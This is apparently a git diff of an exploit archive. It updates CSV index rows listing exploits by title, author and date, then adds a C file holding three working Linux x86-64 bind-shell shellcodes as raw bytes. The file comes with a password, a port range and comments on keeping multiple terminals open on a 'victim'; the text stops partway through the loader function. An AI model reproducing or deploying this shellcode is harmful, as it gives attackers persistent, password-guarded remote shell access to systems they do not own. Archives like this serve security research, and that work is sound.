PoC",2014-09-13,"Joxean Koret",windows,local,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps,0 @@ -31430,8 +31430,8 @@ id,file,description,date,author,platform,type,port 34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' Parameter HTML Injection",2010-10-21,"SecPod Research",php,webapps,0 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 -34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 -34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 +34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 +34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 @@ -31479,7 +31479,7 @@ id,file,description,date,author,platform,type,port 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0 34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 -34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 +34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 @@ -31532,7 +31532,7 @@ id,file,description,date,author,platform,type,port 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 -35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 +35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 - Networking Packet Filter Rules Local Privilege Escalation",2010-11-22,Apple,osx,local,0 @@ -31669,7 +31669,7 @@ id,file,description,date,author,platform,type,port 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 -35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 +35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 @@ -31974,9 +31974,9 @@ id,file,description,date,author,platform,type,port 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0 -35485,platforms/php/dos/35485.php,"PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 -35486,platforms/php/dos/35486.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 -35487,platforms/php/dos/35487.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 +35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 +35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 +35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 @@ -32306,7 +32306,7 @@ id,file,description,date,author,platform,type,port 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 -35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 +35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 @@ -32431,7 +32431,7 @@ id,file,description,date,author,platform,type,port 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting",2011-07-15,SOLVER,php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0 -35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0 +35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 @@ -32573,10 +32573,10 @@ id,file,description,date,author,platform,type,port 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include",2011-09-15,KedAns-Dz,php,webapps,0 36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 -36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 +36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 -36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 @@ -33675,7 +33675,7 @@ id,file,description,date,author,platform,type,port 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0 -37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 +37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 @@ -33768,7 +33768,7 @@ id,file,description,date,author,platform,type,port 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0 -37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0 +37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0 37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 @@ -33881,7 +33881,7 @@ id,file,description,date,author,platform,type,port 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 -37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 +37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 @@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Include Vulnerabilities",2012-09-03,AkaStep,php,webapps,0 37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Include",2012-08-04,L0n3ly-H34rT,php,webapps,0 -37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0 +37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 @@ -34949,7 +34949,7 @@ id,file,description,date,author,platform,type,port 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 -38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 +38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 @@ -35929,7 +35929,7 @@ id,file,description,date,author,platform,type,port 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 -40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 @@ -36270,7 +36270,7 @@ id,file,description,date,author,platform,type,port 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 -40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 +40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 @@ -36280,3 +36280,7 @@ id,file,description,date,author,platform,type,port 40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 +40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0 +40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0 +40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 +40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 diff --git a/platforms/lin_x86-64/shellcode/40122.txt b/platforms/lin_x86-64/shellcode/40122.txt new file mode 100755 index 000000000..438dc3048 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40122.txt @@ -0,0 +1,161 @@ +#include +#include + +//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)] +//| Date: [7/15/2016] +//| Exploit Author: [CripSlick] +//| Tested on: [Kali 2.0 x86_x64] +//| Version: [No Program Version, Only Syscalls Used] + +//| ShepherdDowling@gmail.com +//| OffSec ID: OS-20614 +//| http://50.112.22.183/ + + +//|========================================================================================= +//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============ +//| +//| +//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer +//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell. +//| The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 & +//| CODE1 have less features to cut down on byte count giving you more options. +//| +//| Troubleshooting: +//| 1. Problem: A lot of ports appeared on "nmap -p-" but not my port? +//| 1. Answer: This is common when you swap the high and low port +//| +//| 2. Problem: I disconnected and can't reconnect (even when I use the right password) +//| 2. Answer: This is common when re-executing the program (even after making changes) +//| Solve this by closing the terminal completly out, going to your directory +//| recompiling the program and then relaunching. +//| +//| If it is because you typed in the password wrong, wait about 60 seconds to +//| re-connect. No re-execution of the program is required to reconnect for +//| CODE2 & CODE3. +//| +//| 3. Problem: I DoS'd the victim +//| 3. Answer: This probably was because you set the port range too broad. A broad port range +//| takes a lot of CPU power. I suggest keeping it to how many terminals you need. +//| + + + +#define PORT "\x11\x5a" // FORWARD BYTE ORDER +//| PORT: 4442 +#define PASSWORD "\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER +//| PASSWORD = "la crips" + +//| ONLY CODE3 DOES NOT USE "PORT"; IT USES "LOW_PORT" & "HIGH_PORT" +#define HIGH_PORT "\x5f\x11" // REVERSE BYTE ORDER +#define LOW_PORT "\x5b\x11" // REVERSE BYTE ORDER +//| PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447) +//| (remember to use one terminal connection per open port) + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE1 The short bind shell (83 bytes) +//| ========================================================================= +//| This is the shortest bind-shell I could make. I leaned that mov byte takes +//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if +//| you don't want to xor a register but your stack must be NULL on top. +//| This code only supports one terminal. + +unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e\xb0\x29\x0f\x05\x48" +"\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e\x52\xb2\x10\xb0\x31" +"\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40\x88\xc7\x40\xb6\x03" +"\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x50\x48\xbb" +"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE2 Persistent bind shell with a password (148 bytes) +//| ========================================================================= +//| Supports re-connecting after a disconnect (close terminal and open up again) +//| If you type in a password wrong, wait 60 seconds to reconnect. +//| If you close the terminal after you enter the correct password, you can +//| immediatly reconnect. +//| This code only supports one terminal. + + +unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\x6a\x39\x58\x0f\x05\x48\x31\xff" +"\x48\x39\xf8\x74\x79\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e" +"\xb0\x29\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e" +"\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40" +"\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89\xc7\x48" +"\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7" +"\xe6\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b" +"\x0f\x05\xe9\x6c\xff\xff\xff"; + + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes) +//| ========================================================================= +//| This bind shell has everything COD2 has to offer + more while only 29 bytes more +//| You will get as many terminals on the victim as your PORT-RANGE minus 1 +//| Your lowest port will NOT be open (so minus 1 port/terminal from your range) +//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim + + +unsigned char CODE3[] = //replace CODE3 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xf6\x56\x66\x68"HIGH_PORT"\x5b\x48\xff\xcb\x66\x81\xfb"LOW_PORT"" +"\x75\x06\x50\x66\x68"HIGH_PORT"\x5b\x48\x31\xff\x48\xf7\xe7\xb0\x39\x0f" +"\x05\x48\x31\xff\x48\x39\xf8\x74\x7b\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02" +"\x6a\x01\x5e\xb0\x29\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02" +"\x86\xdf\x54\x5e\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b" +"\x0f\x05\x40\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89" +"\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6" +"\x50\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05" +"\x48\x31\xff\x48\xf7\xe7\xe9\x58\xff\xff\xff"; + + + +//|========================== VOID SHELLCODE =========================== +void SHELLCODE() +{ +// This part floods the registers to make sure the shellcode will always run + __asm__("mov 